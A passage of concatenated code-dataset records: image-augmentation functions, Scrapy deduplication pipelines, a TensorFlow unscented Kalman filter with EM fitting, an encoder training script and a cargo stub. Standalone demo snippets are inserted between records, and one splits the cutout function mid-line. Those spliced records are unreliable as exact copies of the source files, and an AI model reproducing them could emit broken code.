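    rect = np.zeros((4, 2), dtype="float32")
    s = pts.sum(axis=1)
    rect[0], rect[2] = pts[np.argmin(s)], pts[np.argmax(s)]
    d = np.diff(pts, axis=1)
    rect[1], rect[3] = pts[np.argmin(d)], pts[np.argmax(d)]
    return rect

shuffled = np.array([[90, 80], [10, 80], [90, 10], [10, 20]], dtype="float32")
print(order_points(shuffled))
# [[10. 20.]   top-left
#  [90. 10.]   top-right
#  [90. 80.]   bottom-right
#  [10. 80.]]  bottom-left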
warped\n\n#===================================================origin=============================================================\ndef aug_image(image):\n\n seq = iaa.Sequential([\n iaa.Fliplr(0.5),\n\n iaa.Affine(rotate= (-8, 8),\n shear = (-8, 8),\n mode='edge'),\n\n iaa.SomeOf((0, 2),\n [\n iaa.GaussianBlur((0, 0.3)),\n iaa.AdditiveGaussianNoise(loc=0, scale=(0.0, 0.01 * 255), per_channel=0.5),\n iaa.AddToHueAndSaturation((-5, 5)), # change hue and saturation\n iaa.PiecewiseAffine(scale=(0.01, 0.03)),\n iaa.PerspectiveTransform(scale=(0.01, 0.1)),\n iaa.JpegCompression(20, 40)\n ],\n random_order=True\n ),\n\n iaa.Cutout(nb_iterations=1, size=(0.02, 0.2), squared=False)\n ])\n\n image = seq.augment_image(image)\n return image\n\n#===================================================crop===============================================================\n# def get_cropped_img(image, bbox, is_mask=False):\n# crop_margin = 0.1 # 0.683 ratio\n\n# size_x = image.shape[1]\n# size_y = image.shape[0]\n\n# x0, y0, x1, y1 = bbox\n\n# dx = x1 - x0\n# dy = y1 - y0\n\n# x0 -= dx * crop_margin\n# x1 += dx * crop_margin + 1\n# y0 -= dy * crop_margin\n# y1 += dy * crop_margin + 1\n\n# if x0 < 0:\n# x0 = 0\n# if x1 > size_x:\n# x1 = size_x\n# if y0 < 0:\n# y0 = 0\n# if y1 > size_y:\n# y1 = size_y\n\n# if is_mask:\n# crop = image[int(y0):int(y1), int(x0):int(x1)]\n# else:\n# crop = image[int(y0):int(y1), int(x0):int(x1), :]\n\n# return crop\n\ndef get_cropped_img_fast(image, bbox):\n x0, y0, x1, y1 = bbox\n return image[y0:y1, x0:x1]\n\ndef get_center_aligned_img(crop_img, pt):\n x0, y0 = pt[2]\n x1, y1 = pt[7]\n\n x = int((x0 + x1) / 2.0)\n w = crop_img.shape[1]\n radius = max(x, w - x)\n s = radius - x\n fill = np.ones([crop_img.shape[0], radius * 2 + 1, 3]).astype(np.uint8) * 128\n\n if x < radius:\n fill[:, s:s + crop_img.shape[1], :] = crop_img\n else:\n fill[:, 0:crop_img.shape[1], :] = crop_img\n\n return fill\n\n\nclass RandomErasing(object):\n \"\"\" Randomly selects a rectangle region in an image and erases its pixels.\n 'Random Erasing Data Augmentation' by Zhong et al.\n See https://arxiv.org/pdf/1708.04896.pdf\n Args:\n probability: The probability that the Random Erasing operation will be performed.\n sl: Minimum proportion of erased area against input image.\n sh: Maximum proportion of erased area against input image.\n r1: Minimum aspect ratio of erased area.\n mean: Erasing value.\n \"\"\"\n\n def __init__(self, probability=0.5, sl=0.02, sh=0.4, r1=0.3, mean=(0.485, 0.456, 0.406)):\n self.probability = probability\n self.mean = mean\n self.sl = sl\n self.sh = sh\n self.r1 = r1\n\n def __call__(self, img):\n\n if random.uniform(0, 1) >= self.probability:\n return img\n\n for attempt in range(100):\n area = img.size()[1] * img.size()[2]\n\n target_area = random.uniform(self.sl, self.sh) * area\n aspect_ratio = random.uniform(self.r1, 1 / self.r1)\n\n h = int(round(math.sqrt(target_area * aspect_ratio)))\n w = int(round(math.sqrt(target_area / aspect_ratio)))\n\n if w < img.size()[2] and h < img.size()[1]:\n x1 = random.randint(0, img.size()[1] - h)\n y1 = random.randint(0, img.size()[2] - w)\n if img.size()[0] == 3:\n img[0, x1:x1 + h, y1:y1 + w] = self.mean[0]\n img[1, x1:x1 + h, y1:y1 + w] = self.mean[1]\n img[2, x1:x1 + h, y1:y1 + w] = self.mean[2]\n else:\n img[0, x1:x1 + h, y1:y1 + w] = self.mean[0]\n return img\n\n return img\n\n\ndef cutout(img, max_height, max_width, min_height=0, min_width=0, fill_value=114):\n img = img.copy()\n\n height, width = img.shape[:2]\n\n hole_height = 
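A standalone run of the cutout recipe that starts above and completes below: sample a hole that fits inside the image, then overwrite it with the fill value (114, matching the default).

import random
import numpy as np

random.seed(1)
img = np.zeros((8, 8), dtype=np.uint8)
hole_h, hole_w = random.randint(1, 4), random.randint(1, 4)
y1, x1 = random.randint(0, 8 - hole_h), random.randint(0, 8 - hole_w)
img[y1:y1 + hole_h, x1:x1 + hole_w] = 114
print((img == 114).sum() == hole_h * hole_w)   # True: hole area filled exactly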
random.randint(min_height, max_height)\n    hole_width = random.randint(min_width, max_width)\n\n    y1 = random.randint(0, height - hole_height)\n    x1 = random.randint(0, width - hole_width)\n    y2 = y1 + hole_height\n    x2 = x1 + hole_width\n\n    img[y1:y2, x1:x2] = fill_value\n    return img\n\n\ndef random_affine(img, degrees=8, translate=.0625, scale=.1, shear=8, border=0):\n    # torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))\n    # https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4\n\n    height = img.shape[0] + border * 2\n    width = img.shape[1] + border * 2\n\n    # Rotation and Scale\n    R = np.eye(3)\n    a = random.uniform(-degrees, degrees)\n    # a += random.choice([-180, -90, 0, 90])  # add 90deg rotations to small rotations\n    s = random.uniform(1 - scale, 1 + scale)\n    R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)\n\n    # Translation\n    T = np.eye(3)\n    T[0, 2] = random.uniform(-translate, translate) * img.shape[0] + border  # x translation (pixels)\n    T[1, 2] = random.uniform(-translate, translate) * img.shape[1] + border  # y translation (pixels)\n\n    # Shear\n    S = np.eye(3)\n    S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180)  # x shear (deg)\n    S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180)  # y shear (deg)\n\n    # Combined rotation matrix\n    M = S @ T @ R  # ORDER IS IMPORTANT HERE!!\n    if (border != 0) or (M != np.eye(3)).any():  # image changed\n        img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))\n    return img\n\n\ndef aug_medium(prob=1):\n    return aug.Compose([\n        aug.HorizontalFlip(p=.5),\n        aug.OneOf([\n            aug.CLAHE(clip_limit=2, p=.5),\n            aug.IAASharpen(p=.25),\n        ], p=0.35),\n        aug.RandomBrightnessContrast(p=.7),\n        aug.OneOf([\n            aug.GaussNoise(p=.35),\n            aug.ISONoise(p=.7),\n            aug.ImageCompression(quality_lower=70, quality_upper=100, p=.7)\n        ], p=.6),\n        aug.RGBShift(p=.5),\n        aug.HueSaturationValue(hue_shift_limit=8, sat_shift_limit=12, val_shift_limit=8, p=.5),\n        aug.ToGray(p=.3)\n    ], p=prob)","repo_name":"jihang-zhang/Tianchi-Taobao-clothes-retrieval","sub_path":"metric_sub/src_train/augmentation.py","file_name":"augmentation.py","file_ext":"py","file_size_in_byte":9232,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"21"} +{"seq_id":"29766520795","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\nfrom scrapy.exceptions import DropItem\n\n\nclass DuplicatesPipeline(object):\n    def __init__(self):\n        self.author_set = set()\n\n    def process_item(self, item, spider):\n        if item['author'] in self.author_set:\n            raise DropItem(\"Found item with duplicate author name: %s\" % item)\n        else:\n            self.author_set.add(item['author'])\n            return item\n\n\nclass QidianHotPipeline:\n    def process_item(self, item, spider):\n        if item[\"form\"] == \"连载\":  # \"连载\" means the book is still being serialized\n            item[\"form\"] = \"LZ\"\n        else:\n            item[\"form\"] = \"WJ\"\n        return item\n","repo_name":"schKatze/qidianhot","sub_path":"qidian_hot/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24314479912","text":"import numpy as np\nimport os\nimport pdb\nimport tensorflow as tf\nimport 
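The DuplicatesPipeline pattern above without scrapy: a seen-set that rejects repeats; ValueError stands in for scrapy's DropItem in this sketch.

class DedupPipeline:
    def __init__(self):
        self.seen = set()
    def process_item(self, item):
        if item["author"] in self.seen:
            raise ValueError(f"duplicate author: {item}")
        self.seen.add(item["author"])
        return item

p = DedupPipeline()
p.process_item({"author": "a"})
try:
    p.process_item({"author": "a"})
except ValueError as e:
    print(e)   # duplicate author: {'author': 'a'}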
random\nimport tensorflow_probability as tfp\ntfd = tfp.distributions\ntfl = tf.linalg\nfrom copy import deepcopy\nimport tensorflow.contrib.eager as tfe\n\nclass ukss_model(object):\n\n def __init__(self, y_ph, a0, P0, k, parameters, update_fun=None,\n noise_state_dep=False, regression=False):\n\n self.y_ph = y_ph\n self.a0 = a0\n self.P0 = P0\n self.Nt = tf.shape(self.y_ph)[0]\n self.parameters = parameters\n self.m = tf.cast(tf.shape(self.a0)[0], tf.float32)\n self.k = tf.cast(k, tf.float32)\n self.regression = regression\n\n if update_fun is None:\n self.update_parameters = self.update_parameters_default\n else:\n self.update_parameters = update_fun\n\n self.make_initial_kalman_state()\n\n self.initial_smoother_state = (\n tf.zeros_like(self.a0), \n tf.zeros_like(self.P0),\n tf.zeros_like(self.P0)\n )\n\n self.noise_state_dep = noise_state_dep\n\n def make_initial_kalman_state(self):\n\n # initialize Kalman state\n a0 = self.a0\n Ht, Qt, Zt, Tt = self.parameters\n H, Q, Z, T = Ht(a0, 0), Qt(a0, 0), Zt(a0, 0), Tt(a0, 0)\n\n K = tf.ones([\n tf.shape(self.a0)[0], \n tf.shape(H)[0]\n ])\n\n v = tf.ones([\n tf.shape(H)[0],\n 1\n ])\n \n t0 = tf.constant(0)\n ll0 = tf.constant([[0.]])\n\n self.initial_kalman_state = (\n self.a0, self.P0, ll0, t0,\n v, self.a0, self.P0,\n self.a0, self.P0, self.P0\n )\n\n def make_sigma_points(self, m, at, Pt):\n \n try:\n Pts = tf.linalg.cholesky(Pt)\n except:\n pdb.set_trace()\n\n x0 = at\n x1 = at + Pts * tf.sqrt(\n tf.cast(m + self.k, tf.float32))\n x2 = at - Pts * tf.sqrt(\n tf.cast(m + self.k, tf.float32))\n X = tf.concat([x0, x1, x2], axis=1)\n\n w0 = tf.ones([1, 1]) * self.k / (m + self.k)\n w12 = tf.ones([1, 2 * m]) * 1 / (\n 2 * (m + self.k))\n\n W = tf.concat([w0, w12], axis=1)\n\n return X, W\n\n def get_uk_filter_step(self, params):\n \n def _uk_filter_step(kalman_state, y):\n\n '''\n Performs one Kalman filter step\n '''\n \n H, Q, Z, T = params\n \n a_prior, P_prior, ll, t, _, _, _, _, _, _ = kalman_state\n\n X, W = self.make_sigma_points(self.m, a_prior, P_prior)\n\n yb = tf.reduce_sum(\n Z(X, t) * W, axis=1, keepdims=True)\n u = Z(X, t) - yb\n v = y - yb\n\n P_av = tf.matmul(\n (X - a_prior) * W,\n u, transpose_b=True\n )\n\n if not self.noise_state_dep:\n Hx = H(a_prior, t)\n else:\n Hfun = lambda x : (x[1] * H(x[0][:, None], t), 0.)\n Heval = tf.map_fn(\n Hfun, (\n tf.transpose(X),\n tf.transpose(W)\n )\n )\n Hx = tf.reduce_sum(Heval[0], axis=0)\n\n P_vv = tf.matmul(\n u * W, u, transpose_b=True\n ) + Hx\n\n try:\n P_vv_inv = tf.linalg.inv(P_vv)\n except:\n pdb.set_trace()\n\n P_vv_inv = tf.linalg.inv(P_vv)\n\n apo = a_prior + tf.matmul(\n P_av, tf.matmul(\n P_vv_inv, v\n )\n )\n\n Ppo = P_prior - tf.matmul(\n P_av, tf.matmul(\n P_vv_inv, P_av,\n transpose_b=True\n )\n )\n\n Ppo = Ppo + 1e-4 * tf.eye(tf.shape(Ppo)[0])\n\n X, W = self.make_sigma_points(self.m, apo, Ppo)\n\n apr = tf.reduce_sum(\n T(X, t) * W, axis=1, keepdims=True\n )\n\n if not self.noise_state_dep:\n Qx = Q(a_prior, t)\n else:\n Qfun = lambda x : (x[1] * Q(x[0][:, None], t), 0.)\n Qeval = tf.map_fn(\n Qfun, (\n tf.transpose(X),\n tf.transpose(W)\n )\n )\n Qx = tf.reduce_sum(Qeval[0], axis=0)\n\n Ppr = tf.matmul(\n (T(X, t) - apr) * W, \n T(X, t) - apr, transpose_b=True\n ) + Qx\n\n Ppr = Ppr + 1e-4 * tf.eye(tf.shape(Ppr)[0])\n\n Ct1 = tf.matmul(\n (X - apo) * W,\n T(X, t) - apr, transpose_b=True\n )\n\n ll = - 0.5 * (\n tf.linalg.logdet(P_vv) + \n tf.matmul(v, tf.matmul(P_vv_inv, v), transpose_a=True)\n )\n \n t += 1\n\n return (apr, Ppr, ll, t, v, a_prior, P_prior, apo, 
Ppo, Ct1)\n \n return _uk_filter_step\n\n def run_kalman_filter(self, params):\n \n _uk_filter_step = self.get_uk_filter_step(params)\n \n self.filtered = tf.scan(\n _uk_filter_step, self.y_ph, self.initial_kalman_state\n )\n\n return self.filtered\n\n def get_kalman_smoother_step(self, params):\n\n def _kalman_smoother_step(smoother_state, filter_state):\n\n apr, Ppr, _, t, _, _, _, apo, Ppo, Ct1 = filter_state\n atp1_smooth, Ptp1_smooth, _ = smoother_state\n\n Ptp1_inv = tf.linalg.inv(Ppr)\n G = tf.matmul(Ct1, Ptp1_inv)\n \n if tf.math.equal(t, self.Nt):\n # deal with last step\n at_smooth = apo\n Pt_smooth = Ppo\n else:\n at_smooth = apo + tf.matmul(\n G, (atp1_smooth - apr)\n )\n Pt_smooth = Ppo + tf.matmul(\n G, tf.matmul(\n Ptp1_smooth - Ppr, G,\n transpose_b=True\n )\n )\n\n return (at_smooth, Pt_smooth, G)\n\n return _kalman_smoother_step\n \n def run_kalman_smoother(self, params):\n\n _ = self.run_kalman_filter(params)\n \n _kalman_smoother_step = self.get_kalman_smoother_step(params)\n \n self.smoothed = tf.scan(\n _kalman_smoother_step, self.filtered,\n self.initial_smoother_state, reverse=True\n )\n\n return self.smoothed\n\n def update_parameters_default(self, params):\n\n # This is just a default option\n\n _params = self.parameters\n _params[0] = tf.exp(params)\n\n return _params\n\n\n def numerical_gradients(self, params, dx=1e-4):\n \n _params_np = params.numpy()\n grads = []\n for i, p in enumerate(_params_np):\n _params_np_l = deepcopy(_params_np)\n _params_np_h = deepcopy(_params_np)\n\n _params_np_l[i] = p - dx\n _params_np_h[i] = p + dx\n loss_h = self.loss_eager(\n tf.constant(_params_np_h))\n loss_l = self.loss_eager(\n tf.constant(_params_np_l))\n\n grad = (loss_h - loss_l) / (2 * dx)\n grads.append(grad)\n\n return tf.stack(grads)\n\n def log_prob_eager(self, params, dx=1e-4):\n \n with tf.GradientTape(persistent=True) as tape:\n \n tape.watch(params)\n print(params)\n _params = self.update_parameters(params)\n\n _ = self.run_kalman_filter(_params)\n\n loss = - tf.reduce_mean(\n self.filtered[2]\n )\n \n print('loss = %s' % loss.numpy())\n\n grad = tape.gradient(loss, params)\n if (np.any(np.isnan(grad.numpy())) or \n np.any(np.abs(grad.numpy()) > 1e4)\n ): \n grad = self.numerical_gradients(params, dx=dx)\n \n print('Numerically estimating gradients')\n\n return loss, grad\n\n def loss_eager(self, params):\n\n _params = self.update_parameters(params)\n\n _ = self.run_kalman_filter(_params)\n\n loss = - tf.reduce_mean(\n self.filtered[2]\n )\n\n return loss\n\n def log_prob(self, params):\n\n _params = self.update_parameters(params)\n\n _ = self.run_kalman_filter(_params)\n\n loss = - tf.reduce_sum(\n self.filtered[2]\n )\n\n grad = tf.gradients(loss, params)[0]\n\n return loss, grad\n\n def approx_second_deriv(self, params_h, params_l, dx):\n \n _, grad_h = self.log_prob(params_h)\n _, grad_l = self.log_prob(params_l)\n\n d2Ldx2 = (grad_h - grad_l) / (2 * dx)\n\n return d2Ldx2\n\n def standard_errors(self, sess, fd, params, dx):\n\n sds = []\n\n for i, pa in enumerate(params):\n param_h = deepcopy(params)\n param_l = deepcopy(params)\n param_h[i] += dx\n param_l[i] -= dx\n\n d2Ldx2 = sess.run(\n self.approx_second_deriv(\n tf.constant(param_h),\n tf.constant(param_l), dx),\n feed_dict = fd\n )\n\n sd = 1. 
/ np.sqrt(d2Ldx2[i])\n sds.append((pa, sd))\n\n return sds\n\n def fit(self, sess, fd, start, tolerance=1e-5,\n dx=1e-6, inital_inverse_hessian=None):\n\n optim_results = tfp.optimizer.bfgs_minimize(\n self.log_prob, initial_position=start,\n tolerance=tolerance,\n initial_inverse_hessian_estimate=inital_inverse_hessian)\n\n results = sess.run(optim_results, feed_dict=fd)\n\n assert(results.converged)\n print (\"Function evaluations: %d\" % results.num_objective_evaluations)\n\n sds = self.standard_errors(sess, fd, results.position, dx)\n\n return results, sds\n\n def expectation_step(self, params_current, pcross=None):\n\n _params_current = self.update_parameters(params_current)\n\n smoothed = self.run_kalman_smoother(_params_current)\n\n # Evaluate the Gaussian integrals with sigma point approximations\n a_smoothed = smoothed[0].numpy()\n P_smoothed = smoothed[1].numpy()\n G = smoothed[2].numpy()\n P_cross = []\n\n sig_points_transition = []\n for t in range(1, a_smoothed.shape[0]):\n mean_transition = tf.concat([a_smoothed[t, :, :], a_smoothed[t-1, :, :]], axis=0)\n if pcross is None:\n S1 = tf.concat([P_smoothed[t, :, :],\n tf.matmul(P_smoothed[t, :, :],\n G[t-1, :, :], transpose_b=True)], axis=1)\n S2 = tf.concat([tf.matmul(G[t-1, :, :],\n P_smoothed[t, :, :]),\n P_smoothed[t-1, :, :]], axis=1)\n else:\n S1 = tf.concat([P_smoothed[t, :, :],\n pcross[t]], axis=1)\n S2 = tf.concat([pcross[t],\n P_smoothed[t-1, :, :]], axis=1)\n S_transition = tf.concat([S1, S2], axis=0)\n P_cross.append(tf.matmul(G[t-1, :, :],\n P_smoothed[t, :, :]))\n\n X, W = self.make_sigma_points(2 * self.m, mean_transition, S_transition)\n sig_points_transition.append([X, W])\n\n sig_points_measurement = []\n for t in range(0, a_smoothed.shape[0]):\n X, W = self.make_sigma_points(self.m, a_smoothed[t, :, :], P_smoothed[t, :, :])\n sig_points_measurement.append([X, W])\n\n return a_smoothed, P_smoothed, sig_points_measurement, sig_points_transition, G, P_cross\n\n def maximization_step(self, params_current, params_smooth=None, pcross=None):\n \n if params_smooth is None:\n a_smoothed, P_smoothed, sig_points_measurement, sig_points_transition, G, P_cross = self.expectation_step(params_current, pcross=pcross)\n _params = self.update_parameters(params_current)\n else:\n a_smoothed, P_smoothed, sig_points_measurement, sig_points_transition, G, P_cross = self.expectation_step(params_smooth, pcross=pcross)\n _params = self.update_parameters(params_smooth)\n\n H, Q, Z, T = _params\n\n m_dim = tf.cast(self.m, tf.int32)\n\n Sigma = 0\n Phi = 0\n Theta = 0\n B = 0\n C = 0\n D = 0\n\n H_star = 0\n\n for t in range(1, a_smoothed.shape[0]):\n X_m, W_m = sig_points_measurement[t-1]\n X_t, W_t = sig_points_transition[t-1]\n \n Sigma_t = P_smoothed[t, :, :] + tf.matmul(\n a_smoothed[t, :, :], a_smoothed[t, :, :], transpose_b=True) \n Sigma += Sigma_t\n\n Phi_t = tf.matmul(\n W_m * T(X_m, t, non_linear_only=True),\n T(X_m, t, non_linear_only=True),\n transpose_b=True\n ) \n Phi += Phi_t\n\n Theta_t = tf.matmul(\n W_m * Z(X_m, t, non_linear_only=True),\n Z(X_m, t, non_linear_only=True),\n transpose_b=True\n )\n Theta += Theta_t\n\n B_t = tf.matmul(\n W_m * self.y_ph[t, :, :],\n Z(X_m, t, non_linear_only=True),\n transpose_b=True\n )\n B += B_t\n\n C_t = tf.matmul(\n W_t * X_t[0:m_dim, :],\n T(X_t[m_dim:, :], t, non_linear_only=True),\n transpose_b=True\n )\n C += C_t\n\n D_t = tf.matmul(\n self.y_ph[t, :, :],\n self.y_ph[t, :, :],\n transpose_b=True\n )\n D += D_t\n\n if self.regression:\n Z_lin = params_current['Z_lin'][t]\n\n 
H_star += (\n D_t - tf.matmul(B_t, Z_lin, transpose_b=True) -\n tf.matmul(Z_lin, B_t, transpose_b=True) +\n tf.matmul(Z_lin, tf.matmul(Theta_t, Z_lin, transpose_b=True))\n )\n\n time_steps = a_smoothed.shape[0]\n\n Sigma = Sigma / time_steps\n Phi = Phi / time_steps\n Theta = Theta / time_steps\n B = B / time_steps\n C = C / time_steps\n D = D / time_steps\n\n Z_lin_star_r, T_lin_star_r = self.optimal_ZT(C, B, Phi, Theta)\n\n Q_star = (\n Sigma - tf.matmul(C, T_lin_star_r, transpose_b=True) -\n tf.matmul(T_lin_star_r, C, transpose_b=True) +\n tf.matmul(T_lin_star_r, tf.matmul(Phi, T_lin_star_r, transpose_b=True))\n )\n\n if self.regression:\n H_star = H_star / time_steps\n else:\n H_star = (\n D - tf.matmul(B, Z_lin_star_r, transpose_b=True) -\n tf.matmul(Z_lin_star_r, B, transpose_b=True) +\n tf.matmul(Z_lin_star_r, tf.matmul(Theta, Z_lin_star_r, transpose_b=True))\n )\n\n a_0_star = (\n a_smoothed[0, :, :]\n )\n self.a0 = a_0_star\n\n P0_star = (\n P_smoothed[0, :, :] + tf.matmul(\n a_smoothed[0, :, :] - self.a0,\n a_smoothed[0, :, :] - self.a0,\n transpose_b=True\n )\n )\n\n P0_current = deepcopy(self.P0)\n self.P0 = P0_star\n \n params_new = deepcopy(params_current)\n\n H_star_r, Q_star_r = self.optimal_HQ(H_star, Q_star)\n \n params_new['Q'] = Q_star_r\n params_new['H'] = H_star_r\n if not self.regression:\n params_new['Z_lin'] = Z_lin_star_r\n params_new['T_lin'] = T_lin_star_r\n\n obj = self.em_objective(time_steps, params_new, H_star, Q_star, P0_star)\n obj_pre = self.em_objective_pre(time_steps, params_current, H_star, Q_star, P0_current)\n\n self.params_record = params_new\n\n return obj, obj_pre, params_new\n\n def em_objective_pre(self, time_steps, params_current, H_star, Q_star, P0_current):\n pass\n\n\n def em_objective(self, time_steps, params_new, H_star, Q_star, P0_star):\n\n # Evaluate the objective function at the new optimal parameters\n\n ll_intial_conditions = - 0.5 * tf.linalg.logdet(self.P0)\n ll_intial_conditions += - 0.5 * tf.trace(\n tf.matmul(\n tf.linalg.inv(self.P0), P0_star\n )\n )\n\n ll_measurement = - 0.5 * tf.linalg.logdet(params_new['Q'])\n ll_measurement += - 0.5 * tf.trace(\n tf.matmul(\n tf.linalg.inv(params_new['Q']), Q_star\n )\n )\n ll_measurement = ll_measurement * time_steps\n\n ll_transition = - 0.5 * tf.linalg.logdet(params_new['H'])\n ll_transition += - 0.5 * tf.trace(\n tf.matmul(\n tf.linalg.inv(params_new['H']), H_star\n )\n )\n ll_transition = ll_transition * time_steps\n\n obj = -(ll_intial_conditions + ll_measurement + ll_transition)\n\n return obj\n\n def optimal_HQ(self, H, Q, args=None):\n\n # Optimal H, Q if restricted to diagonal.\n\n Q_diag = tf.diag(tf.linalg.diag_part(Q))\n H_diag = tf.diag(tf.linalg.diag_part(H))\n\n return H_diag, Q_diag\n\n def optimal_ZT(self, C, B, Phi, Theta, args=None):\n\n T_lin_star = tf.matmul(C, tf.linalg.inv(Phi))\n Z_lin_star = tf.matmul(B, tf.linalg.inv(Theta))\n\n return Z_lin_star, T_lin_star\n\n def get_objective_EM_numerical(self, params_current):\n\n a_smoothed, P_smoothed, sig_points_measurement, sig_points_transition, G, P_cross = self.expectation_step(params_current)\n\n def _objective_EM(params):\n\n _params = self.update_parameters(params)\n H, Q, Z, T = _params\n\n ll_intial_conditions = - 0.5 * tf.linalg.logdet(self.P0)\n ll_intial_conditions += - 0.5 * tf.trace(\n tf.matmul(\n tf.linalg.inv(self.P0),\n P_smoothed[0, :, :] + tf.matmul(\n a_smoothed[0, :, :] - self.a0,\n a_smoothed[0, :, :] - self.a0,\n transpose_b=True\n )\n )\n )\n\n ll_transition = 0\n ll_measurement = 0\n for t in 
range(1, a_smoothed.shape[0]):\n # Assume Q is not a function of state - evaluate at initial state.\n Qt = Q(self.a0, t)\n ll_transition += - 0.5 * tf.linalg.logdet(Qt)\n X, W = sig_points_transition[t-1]\n m_dim = tf.cast(self.m, tf.int32)\n cov_transition = tf.matmul(\n (X[0:m_dim, :] - T(X[m_dim:, :], t)) * W,\n (X[0:m_dim, :] - T(X[m_dim:, :], t)),\n transpose_b=True\n )\n ll_transition += - 0.5 * tf.trace(\n tf.matmul(\n tf.linalg.inv(Qt),\n cov_transition\n )\n )\n\n # Assume H is not a function of state - evaluate at initial state.\n Ht = H(self.a0, t)\n ll_measurement += - 0.5 * tf.linalg.logdet(Ht)\n X, W = sig_points_measurement[t-1]\n cov_measurement = tf.matmul(\n (self.y_ph[t, :, :] - Z(X, t)) * W,\n (self.y_ph[t, :, :] - Z(X, t)),\n transpose_b=True \n )\n \n ll_transition += - 0.5 * tf.trace(\n tf.matmul(\n tf.linalg.inv(Ht),\n cov_measurement\n )\n )\n\n\n total_objective = - (\n ll_intial_conditions +\n ll_transition +\n ll_measurement\n )\n\n return total_objective\n\n return _objective_EM\n\n","repo_name":"ChristophAy/tensorflow_probability_ukf","sub_path":"ukfssm.py","file_name":"ukfssm.py","file_ext":"py","file_size_in_byte":19987,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"18627957272","text":"from arm_pytorch_utilities.rand import seed\nfrom datetime import datetime\nimport signal\nimport sys\nimport shutil\nimport argparse\nfrom src.training import MyDatasetBuilder, Trainer\nfrom src.utils import EncDataset\nfrom torch.utils.data import DataLoader, RandomSampler\nfrom torch.utils.tensorboard import SummaryWriter\nfrom functools import partial\nimport os\n\n\ndef sigint_handler(model_name, model_trainer, signal, frame):\n print('Early exit from trainer, attempting to save current model {0} ...'.format(model_name))\n model_trainer.save()\n sys.exit(0)\n\n\ndef main(args):\n # Attempt to create an EncDataset object with the passed folder name\n enc_dataset = EncDataset(args.folder)\n\n # Retrieve name of simple model\n simp_model = enc_dataset.get_simp_model()\n\n # Retrieve number of stacked together frames we want to train this model for\n nframes = enc_dataset.get_nframe()\n\n # Retrieve python enc config object\n config = enc_dataset.get_enc_cfg()\n\n current_time = datetime.now().strftime('%b%d_%H-%M-%S')\n model_name = \"model_{0}_enc_{1}frame_{2}\".format(simp_model, nframes, current_time)\n # Create a directory for storing model hparams/config\n model_dir_path = \"models/encoder/{0}\".format(model_name)\n # Copy config file used for creating model to model-dir\n os.makedirs(model_dir_path, exist_ok=True)\n shutil.copyfile('src/config/cartpole_config.py', '{0}/config.py'.format(model_dir_path))\n\n print('Training Model: {}'.format(model_name))\n # set seed\n seed(randseed=config.seed)\n mywriter = None\n # Use TensorBoardX object to log\n if args.log:\n mywriter = SummaryWriter(flush_secs=20, log_dir='runs/encoder/{0}'.format(model_name))\n device = config.device\n\n print('Making dataloader ...')\n\n dataset_builder = MyDatasetBuilder(config=config, excluded_augs=args.excluded_augs)\n\n train_dataset = dataset_builder.get_dataset(dataset_type='train')\n train_sampler = RandomSampler(train_dataset)\n train_loader = DataLoader(train_dataset, sampler=train_sampler, batch_size=config.batch_size,\n num_workers=config.num_workers, drop_last=True)\n\n test_dataset = dataset_builder.get_dataset(dataset_type='test')\n test_sampler = RandomSampler(test_dataset)\n test_loader = DataLoader(test_dataset, 
sampler=test_sampler, batch_size=config.batch_size,\n                             num_workers=config.num_workers, drop_last=True)\n\n    trainer = Trainer(model_name, config, mywriter)\n    # SIGINT handler for early exit to training, pycharm complains incorrectly\n    signal.signal(signal.SIGINT, partial(sigint_handler, model_name, trainer))\n    # Train Model\n    trainer.model.train()\n\n    print(\"Training...\")\n    trainer.run(train_loader, test_loader)\n    test_loss = trainer.test(train_loader)\n    print(\"Final train loss: {}\".format(test_loss))\n\n    # Prints final test loss\n    test_loss = trainer.test(test_loader)\n    print(\"Test loss: {}\".format(test_loss))\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    # dcartpole = double-cartpole, dubins = dubins car\n    parser.add_argument(\"--folder\",\n                        action='store',\n                        type=str,\n                        help=\"Name of the folder from which to take train data, \"\n                             \"should follow format of EncFolder even if not saving generated frames to disk\",\n                        metavar=\"folder\")\n\n    parser.add_argument(\"--log\",\n                        action='store_true',\n                        help=\"log training session with TensorBoard\",\n                        dest=\"log\")\n\n    parser.add_argument(\"--augs\",\n                        action='store',\n                        nargs='*',\n                        choices=[\"no_fg_texture\", \"no_bg_simp_model\", \"no_bg_shape\", \"no_bg_imgnet\", \"no_noise\"],\n                        type=str,\n                        help=\"Kinds of augmentations to be excluded from training: \"\n                             \"fg_texture=Apply random FG textures\"\n                             \"bg_simp_model=Have other simple models in background as distractors\"\n                             \"bg_shape: Have simulator-esque random regular polygon shapes in the bg\"\n                             \"bg_imgnet: Randomize the background with images from the imgnet dataset\",\n                        dest=\"excluded_augs\",\n                        metavar=\"excluded_augs\")\n\n    args = parser.parse_args()\n\n    main(args)\n","repo_name":"ishank-juneja/Online-Model-Selection","sub_path":"src/training/train_encoder.py","file_name":"train_encoder.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"70947165492","text":"from cargo import Cargo\n\ncargo = Cargo(id='edible_oil',\n              type_name='string(STR_CARGO_NAME_EDIBLE_OIL)',\n              unit_name='string(STR_CARGO_NAME_EDIBLE_OIL)',\n              type_abbreviation='string(STR_CID_EDIBLE_OIL)',\n              sprite='NEW_CARGO_SPRITE',\n              weight='1.0',\n              